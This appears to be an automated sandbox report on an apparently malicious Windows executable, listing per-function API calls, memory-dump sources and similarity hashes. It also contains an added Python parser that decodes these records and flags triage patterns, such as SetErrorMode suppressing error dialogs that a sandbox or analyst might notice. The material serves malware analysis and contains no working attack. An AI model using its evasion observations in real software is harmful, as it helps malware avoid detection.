                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastRead_memset_strlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 908522378-0
                                                                                                                                                                          • Opcode ID: 96c4fbaf29496c56613da608499bcdc3d9d0b3de491213bf139302cabcdb5147
                                                                                                                                                                          • Instruction ID: 29e374f3cea47b04bc246f6bbb1b4aca9734333d4dcb24ac93908beac239baf2
                                                                                                                                                                          • Opcode Fuzzy Hash: 96c4fbaf29496c56613da608499bcdc3d9d0b3de491213bf139302cabcdb5147
                                                                                                                                                                          • Instruction Fuzzy Hash: 60316F75601209AFDB14DF6ACC84E9B7BAAEF88344B048429F819CB291D735ED11CB64
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • SysStringLen.OLEAUT32(00000001), ref: 004116F3
                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0041174B
                                                                                                                                                                          • SysStringLen.OLEAUT32(00000001), ref: 00411760
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000001), ref: 0041179D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                          • Opcode ID: cb22d3f160cd963155a7f0ec81e4d36ff3c191698e810ec4fcdcafad73882ba8
                                                                                                                                                                          • Instruction ID: ebac4bd09902137770d3daf899634149322960941cc7d1dbf3e2f10b5ae1d7e9
                                                                                                                                                                          • Opcode Fuzzy Hash: cb22d3f160cd963155a7f0ec81e4d36ff3c191698e810ec4fcdcafad73882ba8
                                                                                                                                                                          • Instruction Fuzzy Hash: B321E375900108FBDB109FA4DC81BAAB7B9AF04304F14842BFA19D6361E73ADA84CB54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00438E1F
• __CxxThrowException@8.LIBCMT ref: 00438E75
• SetFilePointer.KERNEL32(?,?,00000000,?,00000088,00438C38,00000000,00000000,00000000,00000000,00000000,0000000C,00438CFA), ref: 00438E81
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00438EC5
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
  • Part of subcall function 004339BD: __EH_prolog3.LIBCMT ref: 004339C4
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3$ErrorException@8FileH_prolog3_LastPointerThrow
• String ID:
• API String ID: 4022812620-0
• Opcode ID: f9b846a0742d8d8dceeeb897006d1cb2cd0d275aa0b01c98d1b8eefa57e51fe6
• Instruction ID: aea2f4e1e04f9cddd84b0b3f456c663f1031e1ff5a2354ee437618813a4cc696
• Opcode Fuzzy Hash: f9b846a0742d8d8dceeeb897006d1cb2cd0d275aa0b01c98d1b8eefa57e51fe6
• Instruction Fuzzy Hash: 08217C71900218EBDB10EFA0CC96FDEB378BB18315F40416AF616A71D1DBB49E45CB88
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00483E18,00483E16,?,?,?,CC858012,?,?,00471468,000000FF), ref: 0040248B
• SysFreeString.OLEAUT32(?), ref: 004024A7
• SysFreeString.OLEAUT32(?), ref: 004024B2
• SetLastError.KERNEL32(?), ref: 004024D2
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFreeLastString
• String ID:
• API String ID: 3822639702-0
• Opcode ID: 638cadda9960e9d26dd4ac7669427dd178c1dce3472d7886c8fcb029850e2969
• Instruction ID: e89c768751c513207eb7c6f0e9dcb856c403105aa896598904ec2c3c7b796f53
• Opcode Fuzzy Hash: 638cadda9960e9d26dd4ac7669427dd178c1dce3472d7886c8fcb029850e2969
• Instruction Fuzzy Hash: 71213631600648AFCB049F28CD08B9A77E5FF08318F01823AEC19E72A1D739E944CB88
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000001,749AD5B0,CC858012,?,74B04D40,?,?,00471888,000000FF,HsG,00403CD4), ref: 00404CE4
• SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00404D32
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast
• String ID: HsG$HsG
• API String ID: 1452528299-815662401
• Opcode ID: f1f7f2cd7fef66fe514b8c4d763dab99e9f6b45e8f0dfbdcc5f3b0aaee8ae0b5
• Instruction ID: 0facb828b6b6934bf470f3032e1fc4125c4f45a975a9da6af6faa08443be2ef1
• Opcode Fuzzy Hash: f1f7f2cd7fef66fe514b8c4d763dab99e9f6b45e8f0dfbdcc5f3b0aaee8ae0b5
• Instruction Fuzzy Hash: BD219C71504700AFDB10DF14C804B66BBF4FB49318F21866EE9199B381C77AE906CBD8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00000000,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 004146C1
• SetErrorMode.KERNEL32(00008003,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218), ref: 004146D0
• GetWindowsDirectoryW.KERNEL32(?,?,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?), ref: 004146E7
• lstrcpyW.KERNEL32 ref: 00414704
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: DirectoryErrorModePathTempWindowslstrcpy
• String ID:
• API String ID: 3576100887-0
• Opcode ID: 98326534d8ff861684aec470495c36b64cebcc9c3b07522a18e67cb76c2f7903
• Instruction ID: 7e1da21bce3b158b14bd673ef3d339f94e7989879422c1a9fefdb32f174533b2
• Opcode Fuzzy Hash: 98326534d8ff861684aec470495c36b64cebcc9c3b07522a18e67cb76c2f7903
• Instruction Fuzzy Hash: A901963170021537D6503AB3AD09E9F2B5EDFD67AAB00083AF909D1282EA68D540C7BD
Uniqueness

Uniqueness Score: -1.00%
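The records above are machine-generated, but their "APIs" lists are what a triager actually reads. The function at 004146C1, for instance, calls SetErrorMode with 00008003 between GetTempPathW and GetWindowsDirectoryW; 0x8003 is SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX, which silences the error dialogs a sandbox or an analyst would otherwise notice. The function at 0040248B reads GetLastError, frees two BSTRs, then calls SetLastError, the usual way cleanup code avoids clobbering the caller's last-error value. The Python below is an added example, not the sandbox vendor's code and not part of the sample: it parses these API lines into records, decodes the SetErrorMode word, flags those two patterns, and rebuilds each record's "API ID" key. The API ID rule is an assumption inferred from the records on this page (it reproduces every API ID shown here), not a documented algorithm. The sample inputs are the API lines of three of these records, copied verbatim.

```python
"""Parser for the per-function "APIs" blocks of this report (added example).

Not the sandbox vendor's code. Turns lines such as
    • SetErrorMode.KERNEL32(00008003,?,...), ref: 004146D0
into records, decodes the SetErrorMode flag word and rebuilds the "API ID"
key. The API ID rule is an ASSUMPTION inferred from the records on this page:
split each API name at capital letters after dropping leading underscores,
a Get/Set/Sys prefix and a trailing W; drop the Cxx marker and one-letter
tokens; de-duplicate and sort; subcall tokens first, then '$', then the rest.
"""
import re
from typing import Dict, List

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
SEM_FLAGS = {  # documented SetErrorMode bits
    0x0001: "SEM_FAILCRITICALERRORS",
    0x0002: "SEM_NOGPFAULTERRORBOX",
    0x0004: "SEM_NOALIGNMENTFAULTEXCEPT",
    0x8000: "SEM_NOOPENFILEERRORBOX",
}
_PREFIX = re.compile(r"^(?:Get|Set|Sys)")
_TOKEN = re.compile(r"[A-Z][^A-Z]*|[a-z][^A-Z]*")

# Sample input: API lines copied verbatim from three records on this page.
SAMPLE_SEEK = """
• __EH_prolog3_GS.LIBCMT ref: 00438E1F
• __CxxThrowException@8.LIBCMT ref: 00438E75
• SetFilePointer.KERNEL32(?,?,00000000,?,00000088,00438C38,00000000,00000000,00000000,00000000,00000000,0000000C,00438CFA), ref: 00438E81
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00438EC5
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
  • Part of subcall function 004339BD: __EH_prolog3.LIBCMT ref: 004339C4
"""
SAMPLE_BSTR = """
• GetLastError.KERNEL32(00483E18,00483E16,?,?,?,CC858012,?,?,00471468,000000FF), ref: 0040248B
• SysFreeString.OLEAUT32(?), ref: 004024A7
• SysFreeString.OLEAUT32(?), ref: 004024B2
• SetLastError.KERNEL32(?), ref: 004024D2
"""
SAMPLE_TEMP = """
• GetTempPathW.KERNEL32(?,?,00000000,00000000,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 004146C1
• SetErrorMode.KERNEL32(00008003,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218), ref: 004146D0
• GetWindowsDirectoryW.KERNEL32(?,?,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?), ref: 004146E7
• lstrcpyW.KERNEL32 ref: 00414704
"""


def parse_api_lines(text: str) -> List[Dict]:
    """One record per API line; lines that are not API calls are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m["args"]
            calls.append({"name": m["name"], "module": m["module"], "ref": m["ref"],
                          "args": [a.strip() for a in raw.split(",")] if raw else [],
                          "subcall": m["sub"]})  # callee address on indented subcall lines
    return calls


def decode_error_mode(arg: str) -> List[str]:
    """Expand a SetErrorMode argument such as '00008003' into flag names."""
    value = int(arg, 16)
    names = [name for bit, name in sorted(SEM_FLAGS.items()) if value & bit]
    unknown = value & ~sum(SEM_FLAGS)  # bits outside the documented set
    return names + ([f"0x{unknown:X}"] if unknown else [])


def _tokens(name: str) -> List[str]:
    base = _PREFIX.sub("", name.lstrip("_"))
    if len(base) > 1 and base.endswith("W"):
        base = base[:-1]
    return [t for t in _TOKEN.findall(base) if len(t) > 1 and t != "Cxx"]


def api_id(calls: List[Dict]) -> str:
    """Rebuild the report's API ID key (assumed rule, see module docstring)."""
    groups = []
    for is_sub in (True, False):
        toks = sorted({t for c in calls if bool(c["subcall"]) == is_sub for t in _tokens(c["name"])})
        if toks:
            groups.append("".join(toks))
    return "$".join(groups)


def notable(calls: List[Dict]) -> List[str]:
    """Patterns worth a triage note, derived from the call list alone."""
    notes, names = [], [c["name"] for c in calls]
    for c in calls:
        if c["name"] == "SetErrorMode" and c["args"] and c["args"][0] != "?":
            flags = "|".join(decode_error_mode(c["args"][0]))
            notes.append(f"SetErrorMode(0x{int(c['args'][0], 16):X}) = {flags}: error dialogs suppressed")
    if "GetLastError" in names and "SetLastError" in names:
        lo, hi = names.index("GetLastError"), names.index("SetLastError")
        if lo < hi:  # read first, restored later: cleanup code preserving the caller's error
            inner = ", ".join(dict.fromkeys(names[lo + 1:hi]))
            notes.append(f"last-error value saved and restored around {inner}")
    return notes


if __name__ == "__main__":
    for label, sample in (("seek", SAMPLE_SEEK), ("bstr", SAMPLE_BSTR), ("temp", SAMPLE_TEMP)):
        calls = parse_api_lines(sample)
        print(label, len(calls), "calls; API ID =", api_id(calls), notable(calls))
```

Point it at a saved copy of any report of this kind and compare `api_id` against the printed "API ID" field: a mismatch means the tokenisation rule assumed here does not hold for that API name, which is the quickest way to refine the assumption. The `notable` output is deliberately narrow; extend the rule list rather than loosening the regex, since the "ref:" address is what lets you jump back to the disassembly to confirm a hit.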

APIs
• __EH_prolog3_GS.LIBCMT ref: 00438F0E
• __CxxThrowException@8.LIBCMT ref: 00438F66
• GetFileSize.KERNEL32(?,?,00000088,00438B51,00000000,0000000C,00438CFA,?,?,?,?,?,?,00000000), ref: 00438F6F
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00438F7C
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorException@8FileH_prolog3_LastSizeThrow
• String ID:
• API String ID: 4197087271-0
• Opcode ID: c2b057fb842b6e7164f9f8edb5e6690897ce99b71b35cc9447a41f87a1caf095
• Instruction ID: 7d077d61ac914cbb7f6f875a3ca4463cf845ed2ba384b32b6ba200ac6798d57f
• Opcode Fuzzy Hash: c2b057fb842b6e7164f9f8edb5e6690897ce99b71b35cc9447a41f87a1caf095
• Instruction Fuzzy Hash: DE118C71900214AFD700EF60C881E9EB375BB08314F40426EF616A71D1DFB49E44CB88
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(CC858012,?,?,?,?,00471888,000000FF,HsG,004043F6,?,00000001,000000FF), ref: 004038DE
• SetLastError.KERNEL32(00477348,00000000,?,00000000), ref: 0040393A
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 1452528299-815662401
                                                                                                                                                                          • Opcode ID: 5a2b26817d39772b000c05083c4b029144a3f0383ee2d35cfaf974a983ab40f5
                                                                                                                                                                          • Instruction ID: a055bc4fbca92020e3c4f53dfec63bd2502774e623b839e0969b71d0bacaea21
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2b26817d39772b000c05083c4b029144a3f0383ee2d35cfaf974a983ab40f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F115B76500744EFD710CF55C904B56BBF8FF49718F20866EE81A87790D77AA505CB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• CharNextW.USER32(?,?,?,00000000,?,00440A8F,?,?,0043FBA1,?,?,0043F6D9,?,?,0043829B,004A43E0), ref: 00440A13
• CharNextW.USER32(?,?,?,00000000,?,00440A8F,?,?,0043FBA1,?,?,0043F6D9,?,?,0043829B,004A43E0), ref: 00440A37
• CharNextW.USER32(00000000,?,?,00000000,?,00440A8F,?,?,0043FBA1,?,?,0043F6D9,?,?,0043829B,004A43E0), ref: 00440A40
• CharNextW.USER32(00000000,?,?,00000000,?,00440A8F,?,?,0043FBA1,?,?,0043F6D9,?,?,0043829B,004A43E0), ref: 00440A45
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CharNext
• String ID:
• API String ID: 3213498283-0
• Opcode ID: cf6b5b185759369791b1d8c4c9b439f74e36ada1be288b58f39c8029f8ff8bf1
• Instruction ID: b80da12b4a0e4f81402496560a4c4555225ebb9c96c1df133f49eee0145fdd2c
• Opcode Fuzzy Hash: cf6b5b185759369791b1d8c4c9b439f74e36ada1be288b58f39c8029f8ff8bf1
• Instruction Fuzzy Hash: B6F0C82251036459FA317BB05C4083BB3A8FB727597114827E340FB250E278CDD197AD
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction ID: 127c8480397d044ac6829e0414e52cd9b65ba8e748966d8ce241c49f842cd720
• Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction Fuzzy Hash: 53017E3604014EFBDF265E84DC428EE3F62BB18355F48841AFA1858135C63BC9B1BB8A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32 ref: 0042F54A
• GetDlgItem.USER32 ref: 0042F55C
  • Part of subcall function 0042FBDD: __EH_prolog3_GS.LIBCMT ref: 0042FBE4
  • Part of subcall function 0042FBDD: SendMessageW.USER32(?,0000101E,00000000,000000FE), ref: 0042FCBA
  • Part of subcall function 0042FBDD: SendMessageW.USER32(?,00001036,00000000,00000020), ref: 0042FCD3
  • Part of subcall function 0042FBDD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FCE1
• EnableWindow.USER32(00000000,00000000), ref: 0042F57A
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0042F595
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$Item$EnableH_prolog3_Window
• String ID:
• API String ID: 3504422573-0
• Opcode ID: 0a3c5a5a0a59c89dd72fa079db85e7a91ef229f9c5d13d31bbbe801adf856be9
• Instruction ID: 7af920907cf75599411dfd37cbc1abea00089cd779bcf9964f2af7a58eb5325f
• Opcode Fuzzy Hash: 0a3c5a5a0a59c89dd72fa079db85e7a91ef229f9c5d13d31bbbe801adf856be9
• Instruction Fuzzy Hash: C001A231741229BFCB214F61AC499AF7F79EB0A7A0B804036F94587211C6759A94EBA8
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Interlocked$DecrementIncrement__lock_free
• String ID:
• API String ID: 3814665652-0
• Opcode ID: 740091e77bd3fe98d8a03a273557952def80354f39e4a6962ff475459b24de57
• Instruction ID: 4b50c739f31fcbcdf9171da800009731871fe61d78232dffbc8b586124af7cc4
• Opcode Fuzzy Hash: 740091e77bd3fe98d8a03a273557952def80354f39e4a6962ff475459b24de57
• Instruction Fuzzy Hash: CC01E131D04A21ABFB21AF25944271E7720BF40729F05006BE80477791CB3C6E82CBCD
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00438935
• InterlockedDecrement.KERNEL32(00000000), ref: 00438945
• CloseHandle.KERNEL32(000000FF), ref: 0043896D
• __CxxThrowException@8.LIBCMT ref: 004389A6
  • Part of subcall function 004389BD: InterlockedDecrement.KERNEL32(004A679C), ref: 004389E2
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: DecrementInterlocked$CloseException@8H_prolog3_HandleThrow
• String ID:
• API String ID: 104201321-0
• Opcode ID: 1146978f61a288e9bf9c6f16eacc1cda4f8fcbae070e030f4969959e002e9d5e
• Instruction ID: 80cd12010bae93d264f543be06dac394872004ece6b422a5d7dc48b3de30585e
• Opcode Fuzzy Hash: 1146978f61a288e9bf9c6f16eacc1cda4f8fcbae070e030f4969959e002e9d5e
                                                                                                                                                                          • Instruction Fuzzy Hash: B101C0705107018FDB34EB62CC45BAAB3B4BF04B25F50952EF056928E1DFBCA940CB0A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,00000002,00000000,00000000), ref: 0040D18C
• KillTimer.USER32(?,000005DC), ref: 0040D1A3
• PostQuitMessage.USER32(00000000), ref: 0040D1AB
• SetTimer.USER32(?,000005DC,000003E8,00000000), ref: 0040D1CC
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: MessagePostTimer$KillQuit
• String ID:
